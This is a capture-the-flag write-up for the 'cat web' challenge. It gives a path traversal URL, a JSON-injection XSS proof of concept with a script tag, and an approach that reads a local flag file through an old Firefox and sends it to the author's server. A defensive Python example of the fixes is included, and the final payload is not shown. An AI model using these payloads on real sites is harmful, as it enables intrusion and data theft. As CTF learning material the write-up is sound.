Team SED (5th)

Web

cat web

  1. http://catweb.zajebistyc.tf/cats?kind=../../../../ ⇒ path traversal

    /app/templates/flag.txt , /app/templates/index.html

  2. User-Agent ⇒ the bot uses Firefox. (Running ./firefox [url] should have the same effect as using the bot.)

  3. XSS

We can overwrite the JSON.

http://catweb.zajebistyc.tf/cats?kind=", "status": "ok", "content":["asdf"], "b":"

This can cause XSS in the img src.

PoC:

">
http://catweb.zajebistyc.tf/?", "status": "ok", "content":["a\\"><script>alert(1);</script>"], "b":"
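">
Why the `kind` value above can overwrite keys, and the server-side fixes for both that and the path traversal in step 1, as an added example that is not the challenge's code. It assumes the server formats the parameter into JSON text; the error wording, `BASE` and all function names are hypothetical.

```python
import json
import os

BASE = "/app/cats"  # hypothetical directory holding the per-kind image folders

# The `kind` value from the writeup's first JSON-overwrite URL.
INJECTED = '", "status": "ok", "content":["asdf"], "b":"'


def error_vulnerable(kind):
    # Assumed behaviour: the parameter is pasted into JSON text unescaped,
    # so a double quote in `kind` ends the string and adds new keys.
    return '{"status": "error", "content": "' + kind + ' could not be found"}'


def error_hardened(kind):
    # A serializer escapes the quote, so `kind` stays inside one string value.
    return json.dumps({"status": "error", "content": kind + " could not be found"})


def safe_kind_dir(kind, base=BASE):
    """Resolve `kind` under `base`; return None if the result escapes it."""
    root = os.path.realpath(base)
    target = os.path.realpath(os.path.join(root, kind))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    # Duplicate keys: the parser keeps the last one, so the injected
    # "status" and "content" replace the server's own values.
    print(json.loads(error_vulnerable(INJECTED)))
    print(json.loads(error_hardened(INJECTED)))
    for kind in ("black", "../templates", "../../../../"):
        print(repr(kind), "->", safe_kind_dir(kind))
```

On the client side, assigning each `content` entry through the DOM (`img.src = value`) instead of building the tag as an HTML string keeps a quote in the value from closing the attribute.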

We can read files with the file:// protocol, but SOP blocks that protocol in an http:// request.

So I tried to request file:///app/templates/index.html, which has the same feature.

It also has XSS, so we can execute arbitrary JS code.

Then request file:///app/templates/flag.txt and pass it to my server.

(This only works on Firefox < 68; the challenge uses Firefox 67.)

Payload: